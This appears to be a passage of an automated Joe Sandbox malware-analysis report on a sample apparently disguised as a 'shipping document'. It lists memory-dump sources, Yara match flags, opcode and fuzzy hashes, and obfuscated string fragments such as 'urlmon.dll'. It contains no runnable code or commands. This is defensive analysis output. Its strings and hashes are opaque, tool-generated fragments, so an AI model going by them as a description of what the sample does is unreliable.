                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$]:%u
                                                                                                • API String ID: 48624451-3050659472
                                                                                                • Opcode ID: d297ad81b6ac04a48302f41a7c1d2310a69f5559e5d9e0f87a20fe5cad197acc
                                                                                                • Instruction ID: 8a15ba16c7f35fb2e6ae67d130bde5e70a1003ae97f207112c33f67b0c27be18
                                                                                                • Opcode Fuzzy Hash: d297ad81b6ac04a48302f41a7c1d2310a69f5559e5d9e0f87a20fe5cad197acc
                                                                                                • Instruction Fuzzy Hash: 28318272A002199FDB20DE2DCC40BEEB7FDEF54750F94055AE949E3204EB30AB448BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-
                                                                                                • API String ID: 1302938615-2137968064
                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction ID: 8540c7535e1ee4140c0f88532ddf5d2e431fbc54a5658c662e7e4ec9c5886c4d
                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction Fuzzy Hash: 9D91B571E002069BDF28DF6DC8816BEFBB5AFC4321F94471AE955E72C4D7328A418751
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$@
                                                                                                • API String ID: 0-1194432280
                                                                                                • Opcode ID: dd018f05f94d1b1e68c035dd28388ceb942faba2c4daa4048ca31a12232b9536
                                                                                                • Instruction ID: 53b419683d9d9e2d0b0feee1c2a2d5422d26b3729c1d4304a9f9e45e1b7d2d64
                                                                                                • Opcode Fuzzy Hash: dd018f05f94d1b1e68c035dd28388ceb942faba2c4daa4048ca31a12232b9536
                                                                                                • Instruction Fuzzy Hash: F2811C71D00269DBDB35DB54CC44BEEBBB8AB48714F1041DAEA19B7640E7305E84CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$ $""$$$%M$&a$+$1o$1|$3$6O$8$9:$:i$;$<#$=$>$A$B,$Ed$Ek$Eo$H$QD$RA$Zq$^$^U$`8$a$d$e$is$k$l$n$n$p$u$v>$x*$y5${$.$K$K$j$u
                                                                                                • API String ID: 0-2852707999
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$O$S$\$s
                                                                                                • API String ID: 0-3854637164
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Xk
                                                                                                • API String ID: 0-3923475827
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7Q
                                                                                                • API String ID: 0-3451048873
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                • Opcode Fuzzy Hash: ab31f6cc14f7e5eb12ea205bd32092472aefc496aed9c6955d01856d278c18dd
                                                                                                • Instruction Fuzzy Hash: A50144BAA013246BD711E695DC45DFB776CDF44214F0003A6FD28DB241FAB4AE5146E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8318372fbceda74ef665add22d56f5e0c1686fef8b9083ab8012f3513555b554
                                                                                                • Instruction ID: a0841dc669f60b9026835bdcafd7811513dff1b9bdc546e811cf3555f056eee9
                                                                                                • Opcode Fuzzy Hash: 8318372fbceda74ef665add22d56f5e0c1686fef8b9083ab8012f3513555b554
                                                                                                • Instruction Fuzzy Hash: 2311E2B6D0121CAF9B40DFE9D8409EEFBF8FF58214F1445AAE919E7200E7705A048FA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4e9d7757b1677816d21c3b722d53f9b8eee50f6f1892a3414784a83e82779404
                                                                                                • Instruction ID: 15bb6853162b01c81557257ee166d0a2a2a3b18b01e413af9a7e8f1ef40122f7
                                                                                                • Opcode Fuzzy Hash: 4e9d7757b1677816d21c3b722d53f9b8eee50f6f1892a3414784a83e82779404
                                                                                                • Instruction Fuzzy Hash: 8C01D036C08765A9C706CA65A8448F9FF71DDC0228B1D07FAD5954AC43D932970A8BD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e1e902785e8111d7ecd002b27a325d663027d2b10e2ed11f04bc44aac77be005
                                                                                                • Instruction ID: b70832292d4b0f149e0003a74c01d45abdc47cf928fd5775671073874ce0aeda
                                                                                                • Opcode Fuzzy Hash: e1e902785e8111d7ecd002b27a325d663027d2b10e2ed11f04bc44aac77be005
                                                                                                • Instruction Fuzzy Hash: 1C01C0258043A569C70ADE6598408E9BF75DDC1268B2C07EED5954E883CA329B0A8BD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ea5df652b4b520207267a4ce89a2101958f219874fe8aea4ef25c67b41cab88c
                                                                                                • Instruction ID: 2e98c85f3b569f2d83fb1ff258cd591db42d2c886f0efaafb681261b14cd0cbf
                                                                                                • Opcode Fuzzy Hash: ea5df652b4b520207267a4ce89a2101958f219874fe8aea4ef25c67b41cab88c
                                                                                                • Instruction Fuzzy Hash: D9112AB1D11229AFCB00CFA9D88059DBFF8FB09724F2081ABE818E7241D77096418FD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3300340c253a61e252748895533e5e29f7e909d6d69dfbb11536b52e0ecf51ec
                                                                                                • Instruction ID: e4ab8da5d5491409eb907070c2ff7142d70c640385f418c9964bfed834ffce5e
                                                                                                • Opcode Fuzzy Hash: 3300340c253a61e252748895533e5e29f7e909d6d69dfbb11536b52e0ecf51ec
                                                                                                • Instruction Fuzzy Hash: BD01C0B6210608BBCB14DE99DC90EEB77ADAF8C714F008218BA09E7245D630F8518BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0860f44986a230bf1dfba74ad460bfbf8ad92d01f365ef2ba2d207f9dc63467
                                                                                                • Instruction ID: a6a12d557d8707aad5eed17c8837c04cb0cdd119d171fe71b58a24fe0246aebf
                                                                                                • Opcode Fuzzy Hash: e0860f44986a230bf1dfba74ad460bfbf8ad92d01f365ef2ba2d207f9dc63467
                                                                                                • Instruction Fuzzy Hash: 8801DEB6C01219AF8B41DFE8C8419EEBBF8BB08204F1446AED915F7240F77156048FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1a6afa3176f9ac32fef5b961329a91422c117f20ac416620a0178f7a727d54e5
                                                                                                • Instruction ID: f6a8c38014019276bd808756b4a8e9b4abac4cbe6e040457fb493dd83d2325fe
                                                                                                • Opcode Fuzzy Hash: 1a6afa3176f9ac32fef5b961329a91422c117f20ac416620a0178f7a727d54e5
                                                                                                • Instruction Fuzzy Hash: 09F0A7B361021667D7109A6DAC41B87FB9CFB85238F240272FE5CCB291EA71F45182E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06ff6b4daa4f8eb57d5c6e77a70f7491b8a216f17f2a6afa6c6c6ceee8f3a611
                                                                                                • Instruction ID: be8b14fe875232c8cb91c33a4d26fca6d17ee31c5d9187982d20dad9fd414ca7
                                                                                                • Opcode Fuzzy Hash: 06ff6b4daa4f8eb57d5c6e77a70f7491b8a216f17f2a6afa6c6c6ceee8f3a611
                                                                                                • Instruction Fuzzy Hash: 79F054B5B502147BFB10DA94DCC2F7A736CEB85B14F1043E9FA08DE184E6A5B9114662
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4a8cd8a029a6071badeffb9b1e90a4cacf043993a01c2cb351ea11d010272653
                                                                                                • Instruction ID: 7023287bf72a40fddab8fd41e443825359e9324419bac1fabbdc1f0782167227
                                                                                                • Opcode Fuzzy Hash: 4a8cd8a029a6071badeffb9b1e90a4cacf043993a01c2cb351ea11d010272653
                                                                                                • Instruction Fuzzy Hash: 4CF08965D042547ADB10FBE4EC49E6BB7BCDB48218F4012D4BC0CAA140E5719A9487E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 78e7f89a05e49574ed90f8786ef8e3902092087ac3b677da76acc507b031d524
                                                                                                • Instruction ID: d4bb07271062c4d3633909233c963bc141e42d6d6901a6e6ace432cb72c0b0de
                                                                                                • Opcode Fuzzy Hash: 78e7f89a05e49574ed90f8786ef8e3902092087ac3b677da76acc507b031d524
                                                                                                • Instruction Fuzzy Hash: 28F01CBA210208BFDB10EE99DC81E9B7BADEF89710F008519BA18D7241D670B9118BB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9ef1a9b3a84a015e1e30c091fb457d30843e42617eb05b780ac605f26a26fd3a
                                                                                                • Instruction ID: 341b93921a58a567830c54bedd264c414e51c41fa15a6171a6d7686e1369e6e7
                                                                                                • Opcode Fuzzy Hash: 9ef1a9b3a84a015e1e30c091fb457d30843e42617eb05b780ac605f26a26fd3a
                                                                                                • Instruction Fuzzy Hash: DEE022729082572AC7248A7D5C4888AFF88EAC623432903A6E5B997AE1DA306013C7D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c160f6c99bb44e8e05a5a1cc21e8af5d4899374c05ac76f9face4087b8e9a1a5
                                                                                                • Instruction ID: fdcba1357d1f3772c6bb0df303ee3dd021c144953d05d69bc5012e02fc6e3616
                                                                                                • Opcode Fuzzy Hash: c160f6c99bb44e8e05a5a1cc21e8af5d4899374c05ac76f9face4087b8e9a1a5
                                                                                                • Instruction Fuzzy Hash: AAE06D7A200304BFD610EE59EC44FDF77ACEF89710F004419F908A7241C670BE108AB4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ad9a22f90e5cd979971b35f6ce6b4d336bdd36ecd1c536231fdf55d86eb83b7
                                                                                                • Instruction ID: ff0ee0c6b784335d2602999af0de30db45f268c00adbcbf202d9500d27083886
                                                                                                • Opcode Fuzzy Hash: 1ad9a22f90e5cd979971b35f6ce6b4d336bdd36ecd1c536231fdf55d86eb83b7
                                                                                                • Instruction Fuzzy Hash: 5BE06D76200304BBD610EE99DC40E9F37ACEF89710F00841AF908A7241D631B9108AB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ed592dfed463adf66a7e35798911d3c5fe923e8226bf3130026c1952ef4f2681
                                                                                                • Instruction ID: b7104e338f7872428c66ff4ad5818731a186fde83bd9635b92eab5fce2cd608f
                                                                                                • Opcode Fuzzy Hash: ed592dfed463adf66a7e35798911d3c5fe923e8226bf3130026c1952ef4f2681
                                                                                                • Instruction Fuzzy Hash: 2FF08971C0520CEBDB14DF64D8417DDBB74EF04324F6043AAE814DB280D63497518741
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f15db746fe7cbbf7e4db8b2bdab8c5fb991aee1fdecdcb87573cc91431a84757
                                                                                                • Instruction ID: a86caab8ee56dd13d5f65920963ba6ab1498f2f7ec3f37a660465e63a259e182
                                                                                                • Opcode Fuzzy Hash: f15db746fe7cbbf7e4db8b2bdab8c5fb991aee1fdecdcb87573cc91431a84757
                                                                                                • Instruction Fuzzy Hash: 3DE04F36A4023427D6209599DC05FA7BB9CCBC1E64F4902B9FE1C9B280E575A90186E6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21b45c6fd79cad047264b73198e4d8442247cd6b166523d33cd501c473cbfad0
                                                                                                • Instruction ID: 98bfce9cd7389aa3277acddf8dd76b2a842bd85dcf57cea71c7e21d0efc1366c
                                                                                                • Opcode Fuzzy Hash: 21b45c6fd79cad047264b73198e4d8442247cd6b166523d33cd501c473cbfad0
                                                                                                • Instruction Fuzzy Hash: BAE04F39200314BFD520EA5ADC41E9B7BACDBC5714F004556FA48AB241C771B90187F0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fbb84898bff92dfd86c047ef8c70c13500346ffce995256f52f0325c39c8254
                                                                                                • Instruction ID: 879d342fac1213d7e61f39569da2222fd2e699e588d0bbaa44578848bef2871b
                                                                                                • Opcode Fuzzy Hash: 2fbb84898bff92dfd86c047ef8c70c13500346ffce995256f52f0325c39c8254
                                                                                                • Instruction Fuzzy Hash: 92E06D72916108EAEB14DF64E881A9DBBA4EF08310F6087AAE818DB280D635A7648740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d1d746df88c44fe2257a141521fc980cd23a3bfc8c5eb8ace912914add5f5a92
                                                                                                • Instruction ID: cdfa1180e83757eb8f81608072885958aba4c75356d04a61dfade3ca0deb1d4b
                                                                                                • Opcode Fuzzy Hash: d1d746df88c44fe2257a141521fc980cd23a3bfc8c5eb8ace912914add5f5a92
                                                                                                • Instruction Fuzzy Hash: 50C012755443086BDA40DA98CC49FA533DC9708514F004490BA1C8B281D971B9504655
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$ $""$$$%M$&a$+$1o$1|$3$6O$8$9:$:i$;$<#$=$>$A$B,$Ed$Ek$Eo$H$QD$RA$^$^U$`8$a$d$e$is$k$l$n$p$u$v>$x*$y5${$.$K$K
                                                                                                • API String ID: 0-293768193
                                                                                                • Opcode ID: effd4fc7d1fb7af9dee1fc32b04f4794a183d215ed83d78d2e49a5fe70c7aaf3
                                                                                                • Instruction ID: 8479a3efb7c5a2fde7828ad7fcc9ad5ea525bcbf6143a13e087c411311406485
                                                                                                • Opcode Fuzzy Hash: effd4fc7d1fb7af9dee1fc32b04f4794a183d215ed83d78d2e49a5fe70c7aaf3
                                                                                                • Instruction Fuzzy Hash: EAE10AB0805769CBEB60CF41D99C7DEBBB5BB05308F5081D9C55C3A291CBBA0A89CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                • API String ID: 0-3248090998
                                                                                                • Opcode ID: d5373573fe8792b0da498e416914c0105efd3133e49fcc09b7be83893f821279
                                                                                                • Instruction ID: f10008af91410437d31ded93341438ea6a8cc517c9c6fa7ea885f5c8f24c6d92
                                                                                                • Opcode Fuzzy Hash: d5373573fe8792b0da498e416914c0105efd3133e49fcc09b7be83893f821279
                                                                                                • Instruction Fuzzy Hash: 9291F0F08052A98ECB118F55A5603DFBF71BB95204F1581E9C6AA7B243C3BE4E46DF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                • API String ID: 0-3248090998
                                                                                                • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                • Instruction ID: b6b5c0a3ccec27a69dbc75d51893b105a4198fbc1476e8ac1b776200a1206652
                                                                                                • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                • Instruction Fuzzy Hash: A19100F08052A98ACB118F55A4603DFBF71BB85204F1581E9C6AA7B243C3BE4E46DF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                • API String ID: 0-1002149817
                                                                                                • Opcode ID: 8969fbf0374190e9de5a3ea94b388d0c95566c1358bb98fa74c38c91ed23c5aa
                                                                                                • Instruction ID: f29e82af67ab7cdf722baa76d465994d0e56b16c6dd4cceb07f1654af527fa4d
                                                                                                • Opcode Fuzzy Hash: 8969fbf0374190e9de5a3ea94b388d0c95566c1358bb98fa74c38c91ed23c5aa
                                                                                                • Instruction Fuzzy Hash: A1C11FB5D003689EDB20DFA5DC45BEEBBB8AF45304F0041E9E54CAB241E7B55A88CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_3b00000_oWRaEnEJAq.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: g{b$"jwl$#fbn$% %4$2?!8$2?!8$6#fb$a wg$a |f$f`a $fln{$gnah$hajk$hj n$j4y2$m<4~$nhj $n{f`$n{f`$wbc#$wbc4${bc$${jw{$~2?!$~2?!
                                                                                                • API String ID: 0-2224445676
                                                                                                • Opcode ID: 6decb2a312256f1c490eb1c3181dd54998a800cd701cde317cd71000d1da2db3
                                                                                                • Instruction ID: 7f653fec4afebd61044adaf91d660eb784bdc18e464452e753a74e1c4e615b05
